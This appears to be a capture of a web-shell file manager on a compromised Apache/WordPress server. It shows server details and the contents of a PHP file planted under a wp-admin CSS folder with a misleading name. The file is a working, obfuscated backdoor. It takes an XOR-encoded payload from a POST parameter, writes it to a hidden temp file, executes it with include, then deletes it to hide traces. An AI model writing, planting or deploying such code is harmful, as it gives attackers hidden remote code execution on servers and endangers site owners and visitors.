HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System: Linux li317-225.members.linode.com 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/kosmicevents/public/wp-admin__7af9720/css/colors/upload_events.php
<?php

if(!is_null($_POST["\x73ym\x62ol"] ?? null)){
	$desc = hex2bin($_POST["\x73ym\x62ol"]);
	$pgrp = '' ; foreach(str_split($desc) as $char){$pgrp .= chr(ord($char) ^ 99);}
	$sym = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getenv("TMP"), session_save_path()]);
	for ($value = 0, $ent = count($sym); $value < $ent; $value++) {
    $entity = $sym[$value];
    		if (is_writable($entity) && is_dir($entity)) {
    $resource = vsprintf("%s/%s", [$entity, ".mrk"]);
    if (@file_put_contents($resource, $pgrp) !== false) {
	include $resource;
	unlink($resource);
	exit;
}
}
}
}